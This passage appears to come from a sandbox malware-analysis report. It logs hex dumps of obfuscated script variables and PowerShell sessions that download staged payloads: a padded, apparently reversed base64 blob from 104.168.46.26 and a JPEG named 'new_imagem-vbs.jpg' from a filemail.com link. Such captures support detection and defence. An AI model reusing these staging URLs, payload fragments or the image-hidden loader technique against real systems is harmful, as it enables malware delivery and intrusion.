                                                                            Nov 26, 2024 09:44:17.456806898 CET1236INData Raw: 00 66 00 55 00 57 00 47 00 63 00 7a 00 55 00 22 00 0d 00 0a 00 4b 00 57 00 70 00 70 00 4c 00 68 00 42 00 51 00 69 00 4b 00 62 00 6d 00 51 00 4f 00 70 00 20 00 3d 00 20 00 22 00 63 00 4c 00 6b 00 64 00 4b 00 57 00 57 00 69 00 6e 00 4b 00 4f 00 61
                                                                            Data Ascii: fUWGczU"KWppLhBQiKbmQOp = "cLkdKWWinKOazoW"ocWdBqCWkWeibon = "CLhcaZzxOhpfLud"BepKgzPWchZRkBc = "liARCIUztGaGZbG"
                                                                            Nov 26, 2024 09:44:17.456819057 CET1236INData Raw: 00 47 00 6f 00 4a 00 72 00 47 00 20 00 3d 00 20 00 22 00 4c 00 57 00 69 00 41 00 41 00 4c 00 76 00 4c 00 7a 00 66 00 61 00 6d 00 6f 00 4c 00 5a 00 22 00 0d 00 0a 00 7a 00 6a 00 7a 00 61 00 6e 00 7a 00 61 00 72 00 62 00 66 00 47 00 50 00 6c 00 6d
                                                                            Data Ascii: GoJrG = "LWiAALvLzfamoLZ"zjzanzarbfGPlmLkPNe = "WocTWAuiWdrLeWL"WLOzbzLRffzriLU = "ANeiOcLLujOGjUe"xiKoWtnZcuheaB
                                                                            Nov 26, 2024 09:44:17.456832886 CET1236INData Raw: 00 6e 00 55 00 76 00 47 00 70 00 4b 00 41 00 57 00 51 00 51 00 22 00 0d 00 0a 00 73 00 57 00 57 00 71 00 57 00 50 00 52 00 6b 00 57 00 6f 00 4c 00 6f 00 6e 00 43 00 75 00 20 00 3d 00 20 00 22 00 76 00 7a 00 4c 00 70 00 4c 00 4b 00 64 00 47 00 57
                                                                            Data Ascii: nUvGpKAWQQ"sWWqWPRkWoLonCu = "vzLpLKdGWpgckWs"nAKmLUpUTiBWcKu = "paeZivILzanzarPlzAh"cbbollJWAqecLkj = "cWzmKpikcie
                                                                            Nov 26, 2024 09:44:17.456944942 CET1236INData Raw: 00 69 00 69 00 4c 00 47 00 65 00 64 00 57 00 62 00 61 00 61 00 4c 00 4c 00 74 00 42 00 20 00 3d 00 20 00 22 00 4f 00 67 00 54 00 47 00 62 00 70 00 57 00 74 00 4c 00 4e 00 57 00 61 00 65 00 55 00 4c 00 22 00 0d 00 0a 00 61 00 62 00 47 00 4e 00 74
                                                                            Data Ascii: iiLGedWbaaLLtB = "OgTGbpWtLNWaeUL"abGNtkuUvoAUiBa = "knLCzanoLlGoKzd"ihnHLRjtxLbdihG = "dmUWWcpLniqoCAP"UxclGKcZfNo
                                                                            Nov 26, 2024 09:44:17.456955910 CET1236INData Raw: 00 4c 00 4b 00 6b 00 6e 00 6c 00 57 00 57 00 7a 00 62 00 22 00 0d 00 0a 00 41 00 50 00 4b 00 78 00 48 00 42 00 53 00 4b 00 57 00 65 00 78 00 4c 00 62 00 50 00 4c 00 20 00 3d 00 20 00 22 00 4c 00 57 00 4b 00 53 00 65 00 61 00 57 00 52 00 65 00 74
                                                                            Data Ascii: LKknlWWzb"APKxHBSKWexLbPL = "LWKSeaWRetpkrkx"OvxebzeOAblNReR = "aOZiKcGioKKKfWL"itAAGWdZlqKIiUv = "ClAKKiLSbZumUL
                                                                            Nov 26, 2024 09:44:17.456965923 CET1236INData Raw: 00 6d 00 57 00 57 00 69 00 55 00 69 00 47 00 4c 00 63 00 20 00 3d 00 20 00 22 00 50 00 42 00 47 00 55 00 63 00 69 00 4c 00 41 00 66 00 65 00 57 00 41 00 57 00 69 00 64 00 22 00 0d 00 0a 00 6d 00 6c 00 4b 00 68 00 66 00 68 00 4c 00 69 00 49 00 65
                                                                            Data Ascii: mWWiUiGLc = "PBGUciLAfeWAWid"mlKhfhLiIenehzR = "dGWnKCWuzUcUWQi"zWBLBzUOGWLZWLT = "chPSWiHiKLPCWKG"ecUeSBlKrHmhBcP
                                                                            Nov 26, 2024 09:44:17.577171087 CET1236INData Raw: 00 57 00 69 00 57 00 63 00 55 00 6b 00 42 00 78 00 57 00 61 00 22 00 0d 00 0a 00 6f 00 43 00 65 00 50 00 6c 00 6c 00 6f 00 61 00 6d 00 75 00 66 00 78 00 5a 00 51 00 62 00 20 00 3d 00 20 00 22 00 55 00 4b 00 74 00 55 00 62 00 57 00 6b 00 43 00 6b
                                                                            Data Ascii: WiWcUkBxWa"oCePlloamufxZQb = "UKtUbWkCkpKbbUK"CUBzbfWUdRedCki = "WLcRaBZSsGLuhWR"WWZAGNszKRchLKk = "KQfNZKiKzUbUIKg


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.449738104.168.46.26808032C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 26, 2024 09:44:45.359901905 CET78OUTGET /1422/RFGVGF.txt HTTP/1.1
                                                                            Host: 104.168.46.26
                                                                            Connection: Keep-Alive
                                                                            Nov 26, 2024 09:44:46.520169020 CET1236INHTTP/1.1 200 OK
                                                                            Date: Tue, 26 Nov 2024 08:44:46 GMT
                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                            Last-Modified: Tue, 26 Nov 2024 03:59:51 GMT
                                                                            ETag: "a0800-627c8e18cb6c8"
                                                                            Accept-Ranges: bytes
                                                                            Content-Length: 657408
                                                                            Keep-Alive: timeout=5, max=100
                                                                            Connection: Keep-Alive
                                                                            Content-Type: text/plain
                                                                            Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 2b 38 67 4e 50 38 79 44 6e 38 77 48 50 59 78 44 54 38 77 43 50 41 73 44 35 37 51 38 4f 6b 75 44 67 37 41 32 4f 38 73 44 48 36 41 76 4f 4d 72 44 72 36 77 6f 4f 73 70 44 52 36 67 69 4f 51 6f 44 43 36 51 67 4f 41 6b 44 2f 35 67 66 4f 30 6e 44 6f 7a 51 7a 4d 77 49 44 70 79 41 71 4d 45 4b 44 67 79 77 6e 4d 77 4a 44 57 79 67 6b 4d 34 49 44 4b 79 67 52 4d 6f 48 44 32 78 51 64 4d 51 48 44 7a 78 67 63 4d 45 48 44 77 78 77 62 4d 34 47 44 72 78 67 61 4d 6b 47 44 6f 78 77 5a 4d 59 47 44 6c 78 41 [TRUNCATED]
                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwD+8gNP8yDn8wHPYxDT8wCPAsD57Q8OkuDg7A2O8sDH6AvOMrDr6woOspDR6giOQoDC6QgOAkD/5gfO0nDozQzMwIDpyAqMEKDgywnMwJDWygkM4IDKygRMoHD2xQdMQHDzxgcMEHDwxwbM4GDrxgaMkGDoxwZMYGDlxAZMMGDixgWMkFDYAAAAQCwBAAAAAADHwgAMAAAAAABAGAOAAAwPs/D5/w9PU/D0/g8P0+Dr/g5PQ+Di/A4P89De/Q3Pw9Da/Q2Pc9DS/A0Ps8DJ/wxPU4D8+guPg7D3+AsPg6Dn+AoPg5DQ+AiPA0D49AcPg2Dg9AWPA1DI9AAPgzDw8AKPAyDY8AEPgwDA7A+OAvDo7A4OgtDQ7AyOEsDA6gvOYrDu6gpO4pDW6gjOYkD+5gdO4mDt5gZO4lDX5AVOwkDE4APOQjDs4AJOwhDU4wDO0gDM4gCOggDG4QxN4fD93w8NEfDu3Q5NEeDg3g3NcdDW3A1NwcDL2gvNsbDz2AsN4aDp2wpNYaDl2woNEaDf2gmNgZDX2glNQZDS2AkNsYDJ2AhNIYDB2AQN4XD81geNUXDz1gcNAXDu1AbNsWDk1wYNMVDP1gQNAQD90QONwSDq0wJNMSDW0AFNERDN0AwM4PD7zw9MoODozQ5MEODUzg0M8MDLygvMwLD5yQtMgKDmywoMEKDfygkMAJDNywiMkED8xgeMcHD1xwcMYGDkxQYM0FDQxgTMsEDHwgOMgDAAB
                                                                            Nov 26, 2024 09:44:46.520195007 CET1236INData Raw: 67 4a 41 47 41 4e 41 41 41 41 50 77 79 44 6d 38 41 4a 50 4d 79 44 69 38 67 48 50 30 78 44 5a 38 77 45 50 45 78 44 51 38 77 44 50 34 77 44 4e 38 41 44 50 67 77 44 48 38 77 77 4f 30 76 44 37 37 67 2b 4f 6b 76 44 34 37 77 39 4f 59 76 44 79 37 51 38
                                                                            Data Ascii: gJAGANAAAAPwyDm8AJPMyDi8gHP0xDZ8wEPExDQ8wDP4wDN8ADPgwDH8wwO0vD77g+OkvD47w9OYvDy7Q8O0uDn7Q5OQuDj7g4OEuDd7A3OgtDS7A0O8sDO7QzOwsDI7wxOMoD96wuOorD56QtOQrDw6wrOsqDl6woOIqDe6AmOYpDV6AlOMpDP6QiOgoDC6AQO8nD+5QfOwnD45wdOMnDt5waOomDm5QZOEmDb5QWOglDX5wUO
                                                                            Nov 26, 2024 09:44:46.520209074 CET1236INData Raw: 6e 44 32 35 41 64 4f 49 6e 44 77 35 67 62 4f 77 6d 44 71 35 41 61 4f 59 6d 44 6b 35 67 59 4f 41 6d 44 65 35 41 58 4f 6f 6c 44 59 35 67 56 4f 51 6c 44 53 35 41 55 4f 34 6b 44 4d 35 67 53 4f 67 6b 44 47 35 41 52 4f 49 6b 44 41 34 67 50 4f 77 6a 44
                                                                            Data Ascii: nD25AdOInDw5gbOwmDq5AaOYmDk5gYOAmDe5AXOolDY5gVOQlDS5AUO4kDM5gSOgkDG5AROIkDA4gPOwjD6AAQAQDQBwDAAA4D5+wtPU7Dz+QsP86Dt+wqPk6Dn+QpPM6Dh+wnP05Db+QmPc5DV+wkPE5DP+QjPs4DJ+whPU4DD+QQP83D99wePk3D39QdPM3Dx9wbP02Dr9QaPc2Dl9wYPE2Df9QXPs1DZ9wVPU1DT9QUP80DN
                                                                            Nov 26, 2024 09:44:46.520221949 CET1236INData Raw: 77 4a 50 59 79 44 6c 38 41 4a 50 4d 79 44 69 38 51 49 50 41 79 44 66 38 67 48 50 30 78 44 63 38 77 47 50 6f 78 44 5a 38 41 47 50 63 78 44 57 38 51 46 50 51 78 44 54 38 67 45 50 45 78 44 51 38 77 44 50 34 77 44 4e 38 41 44 50 73 77 44 4b 38 51 43
                                                                            Data Ascii: wJPYyDl8AJPMyDi8QIPAyDf8gHP0xDc8wGPoxDZ8AGPcxDW8QFPQxDT8gEPExDQ8wDP4wDN8ADPswDK8QCPgwDH8gBPUwDE8wAPIwDB8AwO8vD+AAAAgDQBADAAA0Dx9AcP82Du9QbPw2Dr9gaPk2Do9wZPY2Dl9AZPM2Di9AYP81De9QXPw1Db9QWPY1DV9AVPM1DS9QUPA1DP9QTPw0DL9gSPk0DI9wRPY0DE9gAAAAAXAUAs
                                                                            Nov 26, 2024 09:44:46.520241976 CET1236INData Raw: 35 44 5a 2b 77 6c 50 55 35 44 54 2b 51 6b 50 38 34 44 4e 2b 77 69 50 6b 34 44 48 2b 51 68 50 4d 34 44 42 39 77 66 50 30 33 44 37 39 51 65 50 63 33 44 31 39 77 63 50 45 33 44 76 39 51 62 50 73 32 44 70 39 77 5a 50 55 32 44 6a 39 51 59 50 38 31 44
                                                                            Data Ascii: 5DZ+wlPU5DT+QkP84DN+wiPk4DH+QhPM4DB9wfP03D79QePc3D19wcPE3Dv9QbPs2Dp9wZPU2Dj9QYP81Dd9wWPk1DX9QVPM1DR9wTP00DL9QSPc0DF9wQPEwD/8QPPszD58wNPUzDz8QMP8yDt8wKPkyDn8QJPMyDh8wHP0xDb8QGPcxDV8wEPExDP8QDPswDJ8wBPUwDD8QwO8vD97w+OkvD37Q9OMvDx7w7O0uDr7Q6OcuDl
                                                                            Nov 26, 2024 09:44:46.520253897 CET1236INData Raw: 51 50 41 41 45 41 77 41 55 41 63 41 41 41 41 2f 51 78 50 4b 38 44 41 2b 59 76 50 73 37 6a 34 2b 67 74 50 4f 37 44 78 2b 6f 72 50 77 36 6a 70 2b 77 70 50 53 36 44 69 2b 34 6e 50 30 35 6a 61 2b 41 6d 50 57 35 44 54 2b 49 6b 50 34 34 6a 4c 2b 51 69
                                                                            Data Ascii: QPAAEAwAUAcAAAA/QxPK8DA+YvPs7j4+gtPO7Dx+orPw6jp+wpPS6Di+4nP05ja+AmPW5DT+IkP44jL+QiPa4DE+YQP83j89gePe3D19ocPA3jt9waPi2Dm94YPE2Dc9YWPc1jU9gUP80TM9cSPd0zE9kAP/zT98sOPhzT18oMPAzjt8wKPiyzh8QGPBxjJ8swOwvj57w9OSvDy747O0ujq7A6OWuDj7I4O4tjb7U2O+sjN78hO
                                                                            Nov 26, 2024 09:44:46.520267010 CET1236INData Raw: 53 6a 6c 30 51 49 4e 63 4d 6a 75 7a 45 67 4d 35 4c 7a 36 79 6f 74 4d 4e 4c 6a 77 79 49 6f 4d 74 4a 54 57 79 30 6b 4d 45 45 44 78 78 45 62 4d 50 47 54 61 78 59 45 4d 39 44 44 2b 77 49 50 4d 74 44 6a 53 41 41 41 41 59 43 41 42 67 44 77 50 2f 2f 44
                                                                            Data Ascii: Sjl0QINcMjuzEgM5Lz6yotMNLjwyIoMtJTWy0kMEEDxxEbMPGTaxYEM9DD+wIPMtDjSAAAAYCABgDwP//D2/Q6PS4z/+ksPS6TX+QlPG5TM+EQPq3z39scPA3zu9oZPttzW7A0OIoDs6AqOWqTi68nOwpjV68kOIpTQ64QO5nD95MeOZnzu58ZONmze5wGOyfT63I8NXdDM2s4MCPzozUjMaLTex0aMgGDmxsGM1AAAAwHAEANA
                                                                            Nov 26, 2024 09:44:46.520303965 CET1236INData Raw: 51 64 4f 47 6e 44 70 35 38 5a 4f 61 6d 6a 68 35 73 58 4f 6d 6c 54 57 35 34 55 4f 66 6b 54 41 34 77 50 4f 33 6a 44 37 34 41 4e 4f 73 69 54 65 34 51 48 4f 76 68 44 5a 34 4d 44 4f 50 67 6a 43 34 55 77 4e 36 66 6a 33 33 63 38 4e 73 65 7a 70 33 49 36
                                                                            Data Ascii: QdOGnDp58ZOamjh5sXOmlTW54UOfkTA4wPO3jD74ANOsiTe4QHOvhDZ4MDOPgjC4UwN6fj33c8Nsezp3I6NXeze3s2NKdTR3A0N1czE3EgNjbj32ktNObjs20pNzZjb2kmNeZjQ2gjNdYDG2MhNIUD71cdNzWjr1kaNeWjg14VNxUDL1cSNcUDA0YPNYTz004MNDTzp00JNCSTf0gHNtRTU0cENsQzJ0ICNXMz+zE/MWPT0zw8M
                                                                            Nov 26, 2024 09:44:46.520315886 CET1236INData Raw: 55 44 43 7a 63 50 41 41 41 41 52 41 51 41 45 41 41 41 41 34 4d 65 4e 56 57 44 65 31 59 43 4e 41 50 44 71 79 73 75 4d 79 4b 44 6a 79 41 56 4d 7a 42 54 67 77 41 46 41 41 41 41 4a 41 51 41 41 41 38 6a 73 2f 30 32 50 36 34 44 36 2b 73 72 50 4f 32 44
                                                                            Data Ascii: UDCzcPAAAARAQAEAAAA4MeNVWDe1YCNAPDqysuMyKDjyAVMzBTgwAFAAAAJAQAAA8js/02P64D6+srPO2D39cCP3vjp781OEoj9447NybTXzk8M5MzEyYvMEEjHAAAA0AwAwDgPz4DF9cfP22Tl9EXPq1TZ8UPP5sja6YrOxqjk5YZO1lTU5oUOFhD23E/NBTTZ0sFAAAAOAMA4AAAA9cfPQxDI7o/OdvzJ7sgOyqDm0k1M2PDp
                                                                            Nov 26, 2024 09:44:46.520328999 CET1236INData Raw: 67 4e 4d 53 44 44 78 77 38 4c 4d 35 43 7a 73 77 30 4b 4d 6f 43 6a 6f 77 77 4a 4d 57 43 54 6b 77 73 49 4d 46 43 7a 66 77 6f 48 4d 30 42 6a 62 77 67 47 4d 6a 42 54 58 77 63 46 4d 52 42 44 54 77 59 45 4d 41 42 6a 4f 77 55 44 4d 76 41 54 4b 77 4d 43
                                                                            Data Ascii: gNMSDDxw8LM5Czsw0KMoCjowwJMWCTkwsIMFCzfwoHM0BjbwgGMjBTXwcFMRBDTwYEMABjOwUDMvATKwMCMeADGwIBMMAzBwEAAAAA1AMAUAAAA/s/P1/D8/o+Pk/j3/k9PT/Tz/c8PC/Dv/Y7Pw+zq/U6Pf+Tm/Q5PO+Di/I4P99zd/E3Pr9jZ/A2Pa9DV/80PJ9zQ/0zP48jM/wyPm8TI/sxPV8zD/owPE4j/+gvPz7T7+cuP
                                                                            Nov 26, 2024 09:44:46.641349077 CET1236INData Raw: 69 6a 66 41 41 41 41 73 41 77 41 67 41 77 50 45 2f 7a 72 2f 6f 35 50 2f 51 6a 68 30 41 45 41 41 41 41 46 41 4d 41 45 41 4d 54 30 7a 51 4d 41 41 41 41 44 41 4d 41 41 41 38 54 39 2f 38 39 50 4a 2f 7a 6d 41 41 41 41 51 41 67 41 77 44 41 41 41 49 7a
                                                                            Data Ascii: ijfAAAAsAwAgAwPE/zr/o5P/Qjh0AEAAAAFAMAEAMT0zQMAAAADAMAAA8T9/89PJ/zmAAAAQAgAwDAAAIzAxQfMjHTxxYLAAAAFAIA4AAAA5IUOhkzD5AAOaDAAAQBACAMA1wAN+Tz70UOAAAAEAIAsAwjS84DPgsz+7Q+ODCAAAQBACAKAAAAOdhzU4MxNKYz+2AvNlbj220sN5aTqAAAAgAgAACgP45Dd+AnPs5Da+QmPg5DX


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.449731193.30.119.2054438032C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-11-26 08:44:25 UTC211OUTGET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1
                                                                            Host: 3105.filemail.com
                                                                            Connection: Keep-Alive
                                                                            2024-11-26 08:44:26 UTC328INHTTP/1.1 200 OK
                                                                            Content-Length: 2230233
                                                                            Content-Type: image/jpeg
                                                                            Last-Modified: Mon, 25 Nov 2024 10:41:01 GMT
                                                                            Accept-Ranges: bytes
                                                                            ETag: 67ad55be8fbd7389b2f5ef2b123a44b4
                                                                            X-Transfer-ID: ibybhsntnwgamsn
                                                                            Content-Disposition: attachment; filename=new_imagem-vbs.jpg
                                                                            Date: Tue, 26 Nov 2024 08:44:24 GMT
                                                                            Connection: close
                                                                            2024-11-26 08:44:26 UTC2788INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                            Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                            2024-11-26 08:44:26 UTC8192INData Raw: 7c 20 f1 02 0b 6d 76 25 85 73 99 62 5f 34 d8 1c 7b e1 83 10 a3 8a b3 d7 01 8d 66 a0 49 0c 6a 5b 68 dc c7 75 e1 74 7a 92 cc 1f 71 de be 96 e6 f7 0f 7c c8 f1 3d 3b 6a 61 8e 38 e5 68 88 53 ea 51 cd e4 69 8b 69 b6 02 ec e5 68 59 ea 78 eb 81 ea 25 9c b2 90 2b 69 19 91 39 68 a6 8e 4d 96 a1 83 30 63 c6 30 9a 85 d8 ac 59 55 5b 81 67 92 71 2f 14 95 e6 85 a2 86 89 65 2a 6b b5 e0 6a 45 e2 ed 26 a4 45 1f aa 31 d4 a9 e0 1f 6c cd 97 c4 4b c9 2b 9e 77 31 20 fd 71 4d 32 2f 84 e8 00 6d cc e7 80 7b 9f 8e 27 14 ca fc 0f c3 cf 24 60 3a 67 91 e4 34 0b 1a be b9 07 54 77 8b e0 11 ef df 04 93 a2 2b 51 f5 1e 2b e1 99 7a 9d 2e ac 78 92 ce 35 2d f7 72 2b cb a1 5f 3c 0d 4d 46 b0 24 43 7b 80 01 ea 73 28 78 e4 72 6a 44 11 48 b2 b3 70 42 9e 83 16 f1 5d 24 be 21 a6 68 23 72 9b bd 25 be
                                                                            Data Ascii: | mv%sb_4{fIj[hutzq|=;ja8hSQiihYx%+i9hM0c0YU[gq/e*kjE&E1lK+w1 qM2/m{'$`:g4Tw+Q+z.x5-r+_<MF$C{s(xrjDHpB]$!h#r%
                                                                            2024-11-26 08:44:26 UTC8192INData Raw: 9e 20 ec ab 21 3c 05 3d 6f 34 e6 73 24 2c e4 92 ab db fb 66 59 0c ec 14 0f c4 7a 11 81 0f 13 2c 81 ca 90 80 8e 71 e5 2a 74 e1 e3 2a 55 78 17 d8 df cf 2b 2c 4e 80 47 2a b5 05 dd 83 d3 29 55 65 55 65 1b 88 c0 d0 66 49 22 dc ae c1 81 be 17 8e 98 b8 77 8c 15 90 2d 6e ea 32 88 5e 32 40 1b ab 2a 25 32 69 64 0c c3 75 1f cc 74 c0 b4 00 44 43 48 3d 24 9e be d9 57 87 73 82 09 b3 d6 b1 53 aa 77 34 e4 5d 03 47 e5 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e
                                                                            Data Ascii: !<=o4s$,fYz,q*t*Ux+,NG*)UeUefI"w-n2^2@*%2idutDCH=$WsSw4]GI@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>
                                                                            2024-11-26 08:44:26 UTC8192INData Raw: ed 05 94 82 03 74 e9 c7 e8 70 f2 cd 16 a7 5a 65 2a 17 74 8a 6b b0 1d fb fb e0 7a 1f b4 10 40 82 08 b4 cc 3c 94 8a 67 ab be 42 80 3f 9e 6b e8 1a 11 e1 5a 15 24 16 30 21 20 7f ba 33 c6 6b 34 eb a7 90 36 9e 63 22 b2 b0 03 b0 5a e7 9e 9e ff 00 96 7a 1f 0b d6 14 f0 b8 09 82 d9 54 2a 9a ea 28 60 6b 96 8e 36 f3 18 0d a0 d6 18 79 6e a0 95 e0 f4 23 32 c4 87 56 a6 3a a2 79 2b d0 8c 6a 13 2a 44 b1 9e 4a fb e0 5e 7d 8a a6 f6 91 fa e5 7c f0 cb b4 05 34 3d b2 b2 44 f2 2b 58 17 7f 2c 18 d3 b9 db 5c 10 68 f3 db 02 00 21 0a 03 c9 ef 58 1f 25 5d 8a be d6 db ce de f8 77 66 81 cf 98 85 80 1c 37 b6 20 64 47 d4 17 04 82 45 60 3b 2c 48 48 07 6d 11 c0 1d b0 d0 a2 e9 d0 24 67 8e a4 62 b1 6a 36 30 0e 9b bb 59 ca c9 29 56 2c ad c9 e8 30 0c 1d 9a 6a 0e a2 8d 73 91 3f 98 ac a4 b2 d0
                                                                            Data Ascii: tpZe*tkz@<gB?kZ$0! 3k46c"ZzT*(`k6yn#2V:y+j*DJ^}|4=D+X,\h!X%]wf7 dGE`;,HHm$gbj60Y)V,0js?
                                                                            2024-11-26 08:44:26 UTC8192INData Raw: 4f 2d e8 58 f8 e4 b8 06 24 e0 ee ef ce 06 8f 2c 9d 16 bd f2 84 85 42 a3 6d 9e b8 81 86 40 a0 ed 34 7b de 0e a8 f7 bc 07 80 65 23 90 45 70 0e 11 5c 1b 24 a7 3d 47 b6 26 64 64 41 c7 3f 1c 1a a9 72 4d d6 01 67 27 79 3c 00 3a 56 01 89 6e a7 38 93 c8 eb 9c 4e 07 2d 82 48 1d 32 db 99 ba 91 7d b2 36 d2 d8 3c e5 7b f3 81 72 18 02 4d 50 f8 e5 4f 39 07 a9 ac 8a c0 b8 52 5a 85 5f c4 e1 00 78 c5 82 6b da f8 c1 90 36 83 df 38 b1 6a ae 30 08 ec fb 81 b3 64 58 cb 96 2f 05 13 6d 76 70 5b dd 58 31 22 ea a8 e1 22 6d e7 6e d0 2b 92 7d f0 02 a7 69 e4 73 d4 5e 10 4b c1 6a 17 5c e5 a5 a9 24 b6 1b 68 55 62 e4 51 c0 e3 c9 ce 07 90 7d b2 2b 3a b0 2e ee 59 89 39 4a ce ac ea c0 ea c2 a3 aa ad 15 04 fc 70 55 92 05 91 ce 07 a1 d0 ea 74 e9 a6 8c 81 44 9f 50 f8 e0 b5 9a 89 16 70 a0 1f
                                                                            Data Ascii: O-X$,Bm@4{e#Ep\$=G&ddA?rMg'y<:Vn8N-H2}6<{rMPO9RZ_xk68j0dX/mvp[X1""mn+}is^Kj\$hUbQ}+:.Y9JpUtDPp
                                                                            2024-11-26 08:44:26 UTC8192INData Raw: f9 60 66 97 79 58 09 1c 6d 5e a3 bd 67 d2 3f 64 fa ad 4e 8f c6 3c 5a 6f 0f 81 26 d5 ae 89 76 2b 92 14 a9 96 20 d6 47 b0 24 fd 33 e6 e1 1c 0e 97 f0 cf 65 fb 3e 32 47 37 8d bc 48 4c 8b e1 ea 54 02 07 ff 00 b4 43 ef 80 df 85 06 1f b4 ef 14 31 85 65 bf 12 21 41 2c 08 f2 a6 a1 67 17 fb 7a 61 4d 47 82 94 85 d2 56 f0 7d 1b 02 64 3b 4a 84 65 aa 22 ec 80 bd 0f e7 d7 34 b4 48 cd fb 5f f1 84 55 db 73 f8 90 1b 6b bc 53 0e b9 9b f6 db 4e d2 cb e0 b2 88 a4 47 93 c1 74 81 8b 1b 04 84 ad c3 f2 c0 f5 7f b7 54 77 f1 af 0a 70 c5 b7 69 99 41 1d 0b 06 36 2f e1 9f 37 d1 6b a7 89 02 49 08 05 46 d1 ea eb fe ab 3e 91 fb 5d d2 49 a5 f1 1f b3 f0 31 56 11 69 5d 76 a8 da 4b 06 5d cd ff 00 17 1f 96 7c dd 11 9f 50 bb 49 da 09 1c 0b be 7d f0 1e 7d 4c 8c 9b 8a 00 ac 38 b6 e3 f9 62 6f 23
                                                                            Data Ascii: `fyXm^g?dN<Zo&v+ G$3e>2G7HLTC1e!A,gzaMGV}d;Je"4H_UskSNGtTwpiA6/7kIF>]I1Vi]vK]|PI}}L8bo#
                                                                            2024-11-26 08:44:26 UTC8192INData Raw: db d4 f8 32 aa 7f d9 a4 97 4d 10 21 8c 7a 7d b1 ee 20 df 50 b7 cd 76 39 9f a8 fb 3b a3 d4 3c 6b 36 a7 c4 26 91 97 61 2d 2a b7 96 28 9e 4b 2d f7 02 87 be 23 ff 00 c6 cf 28 0c ba df 0f 56 8c 33 6d 10 ca 37 70 69 4d ad fe 47 3c ff 00 87 f8 d6 a3 5f f6 87 ef b2 be 99 1d 15 99 04 81 fc b5 27 83 b4 2f 36 45 f5 c0 f5 9e 29 e0 11 ea 3c 2f 4d 2e 97 4f 2c d2 41 12 a4 71 82 22 66 5f 48 a6 2c bc 50 b3 5c 1e d8 de 93 ec 8f 85 2a 46 f3 69 8b 49 b1 43 a8 99 8a ab 00 6c f1 b7 ad fc b8 e8 30 3a 4f 1e d4 47 0c 47 c4 35 9a 28 24 75 56 f2 d7 4d 23 32 ab 0d c3 71 dd 57 4c 3a 63 bf fc 43 a3 db 29 6f 15 89 43 2f 58 f4 ce a7 ff 00 16 e1 d3 e0 70 0d a6 f0 1f 0a d2 bb 34 3a 18 99 8d 73 20 2f cf fc 44 9c be aa 57 d4 a3 04 d3 4e ea 19 54 b2 b9 8b 8d f4 d4 41 04 50 5d de cc 3a 5e 66
                                                                            Data Ascii: 2M!z} Pv9;<k6&a-*(K-#(V3m7piMG<_'/6E)</M.O,Aq"f_H,P\*FiICl0:OGG5($uVM#2qWL:cC)oC/Xp4:s /DWNTAP]:^f
